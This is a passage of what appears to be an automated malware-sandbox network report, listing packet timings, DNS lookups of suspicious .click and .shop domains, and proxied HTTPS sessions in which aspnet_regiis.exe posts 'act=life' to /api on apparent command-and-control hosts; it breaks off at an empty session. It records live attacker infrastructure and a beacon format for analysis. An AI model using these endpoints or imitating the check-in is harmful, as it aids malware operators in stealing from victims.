Dec 31, 2024 17:39:46.812876940 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:39:46.814454079 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:39:46.814469099 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:39:46.814708948 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:39:46.824876070 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:39:46.824876070 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:39:46.824956894 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:07.873836994 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:07.873944044 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:07.874030113 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:07.875411034 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:07.875432968 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:07.875444889 CET	49898	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:07.875461102 CET	443	49898	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:07.885900021 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:07.885950089 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:07.886059046 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:07.886385918 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:07.886401892 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.343621016 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.343880892 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.345789909 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.345797062 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.346203089 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.347548008 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.347572088 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.347625017 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.799804926 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.799859047 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.799891949 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.799892902 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.799920082 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.799959898 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.799964905 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.799973965 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.800031900 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.800381899 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.800450087 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.800484896 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.800484896 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.800496101 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.800529003 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.800534964 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.801140070 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.801173925 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.801181078 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.844398975 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.886297941 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.886354923 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.886382103 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.886406898 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.886424065 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.886461973 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.886471033 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.886522055 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.886558056 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.886836052 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.886848927 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:08.886862040 CET	49986	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:08.886867046 CET	443	49986	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:09.052171946 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:09.052234888 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:09.052304029 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:09.052659988 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:09.052671909 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:09.507761955 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:09.507842064 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:09.509182930 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:09.509196997 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:09.509512901 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:09.510802031 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:09.510977030 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:09.511019945 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.010354042 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.010452032 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.010560989 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.010770082 CET	49988	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.010790110 CET	443	49988	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.236289024 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.236346960 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.236433029 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.236787081 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.236800909 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.734255075 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.734503031 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.736303091 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.736313105 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.737426996 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.738775969 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.739008904 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.739042997 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:10.739101887 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:10.783329010 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.254245043 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.254379988 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.254479885 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.254679918 CET	49989	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.254693985 CET	443	49989	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.473458052 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.473517895 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.473603010 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.473942041 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.473958969 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.943928003 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.944071054 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.945420027 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.945436954 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.945678949 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.946904898 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.947051048 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.947084904 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:11.947154045 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:11.947164059 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:12.571788073 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:12.571897984 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:12.571980000 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:12.572299957 CET	49990	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:12.572316885 CET	443	49990	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.052015066 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.052059889 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.052134037 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.052464962 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.052476883 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.518884897 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.518980026 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.520432949 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.520438910 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.520667076 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.521966934 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.522826910 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.522845984 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.522947073 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.522964001 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.523071051 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.523113012 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.523245096 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.523262978 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.523431063 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.523451090 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.523600101 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.523617983 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.523629904 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.523638964 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.523762941 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.523782015 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.523890018 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.523999929 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.524023056 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.533394098 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.533548117 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.533569098 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.533580065 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.533593893 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.533612967 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.533621073 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.533641100 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.533649921 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.533700943 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.533715010 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:13.533766031 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:13.533775091 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.087980032 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.088069916 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.088143110 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.088366032 CET	49991	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.088382959 CET	443	49991	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.225975037 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.226008892 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.226330996 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.226445913 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.226450920 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.682997942 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.683126926 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.684710026 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.684717894 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.684947014 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:16.686331034 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.686419010 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:16.686424971 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:17.146128893 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:17.146229029 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:17.146310091 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:17.146616936 CET	49992	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:17.146630049 CET	443	49992	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:17.692053080 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:17.692116022 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:17.692251921 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:17.692656040 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:17.692673922 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.160321951 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.160408020 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.162024021 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.162039995 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.162266970 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.182149887 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.182915926 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.182960987 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.183073044 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.183100939 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.183244944 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.183284044 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.183475018 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.183506012 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.185506105 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.185542107 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.191556931 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.191595078 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.191608906 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.191625118 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.191827059 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.191848993 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.191879034 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.193085909 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.193281889 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.193319082 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.193344116 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.193375111 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.195450068 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.195487976 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.198009968 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:18.198101044 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:18.198123932 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:20.847961903 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:20.848071098 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:20.848160982 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:20.848392010 CET	49993	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:20.848412991 CET	443	49993	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:20.858953953 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:20.858985901 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:20.859091997 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:20.859460115 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:20.859467030 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.336060047 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.336199999 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.337666035 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.337673903 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.337901115 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.339247942 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.339274883 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.339329004 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794138908 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794184923 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794219017 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794245005 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794270039 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794287920 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.794287920 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.794305086 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794342995 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.794348955 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794395924 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794431925 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.794437885 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794703007 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794733047 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794749975 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.794754982 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794786930 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.794790983 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794866085 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.794905901 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.795150995 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.795161963 CET	443	49994	104.21.96.1	192.168.2.6
Dec 31, 2024 17:40:21.795172930 CET	49994	443	192.168.2.6	104.21.96.1
Dec 31, 2024 17:40:21.795177937 CET	443	49994	104.21.96.1	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:39:14.247349024 CET	50384	53	192.168.2.6	1.1.1.1
Dec 31, 2024 17:39:14.270442963 CET	53	50384	1.1.1.1	192.168.2.6
Dec 31, 2024 17:39:46.244580984 CET	57616	53	192.168.2.6	1.1.1.1
Dec 31, 2024 17:39:46.327467918 CET	53	57616	1.1.1.1	192.168.2.6
Dec 31, 2024 17:39:46.331181049 CET	57016	53	192.168.2.6	1.1.1.1
Dec 31, 2024 17:39:46.340868950 CET	53	57016	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 17:39:14.247349024 CET	192.168.2.6	1.1.1.1	0x9096	Standard query (0)	undesirabkel.click	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.244580984 CET	192.168.2.6	1.1.1.1	0x8d65	Standard query (0)	nearycrepso.shop	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.331181049 CET	192.168.2.6	1.1.1.1	0x1de4	Standard query (0)	abruptyopsn.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 17:39:14.270442963 CET	1.1.1.1	192.168.2.6	0x9096	No error (0)	undesirabkel.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:14.270442963 CET	1.1.1.1	192.168.2.6	0x9096	No error (0)	undesirabkel.click		188.114.96.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.327467918 CET	1.1.1.1	192.168.2.6	0x8d65	Name error (3)	nearycrepso.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.340868950 CET	1.1.1.1	192.168.2.6	0x1de4	No error (0)	abruptyopsn.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.340868950 CET	1.1.1.1	192.168.2.6	0x1de4	No error (0)	abruptyopsn.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.340868950 CET	1.1.1.1	192.168.2.6	0x1de4	No error (0)	abruptyopsn.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.340868950 CET	1.1.1.1	192.168.2.6	0x1de4	No error (0)	abruptyopsn.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.340868950 CET	1.1.1.1	192.168.2.6	0x1de4	No error (0)	abruptyopsn.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.340868950 CET	1.1.1.1	192.168.2.6	0x1de4	No error (0)	abruptyopsn.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:39:46.340868950 CET	1.1.1.1	192.168.2.6	0x1de4	No error (0)	abruptyopsn.shop		104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

undesirabkel.click

abruptyopsn.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	188.114.97.3	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:39:15 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: undesirabkel.click
2024-12-31 16:39:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49898	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:39:46 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: abruptyopsn.shop
2024-12-31 16:39:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-31 16:40:07 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3db4vcl9re1h32s5ju7htqd5i3; expires=Sat, 26 Apr 2025 10:26:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FeLrPejxIZKkDtCa1sxtyGp3LkuP0XkFb8XhrtdZXRXSEw83dXTtFeWZnOfekhw07X26C9cDHfPN6%2B3ycyZ6Vb%2Bz1VjmMQNT3fQpZpQJcEoKSlcB5P0djP6Aivp%2Fdl0HwDX6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb52608091a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1870&rtt_var=723&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3051&recv_bytes=907&delivery_rate=2234693&cwnd=158&unsent_bytes=0&cid=360cd96a2b469159&ts=21073&x=0"
2024-12-31 16:40:07 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-31 16:40:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49986	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
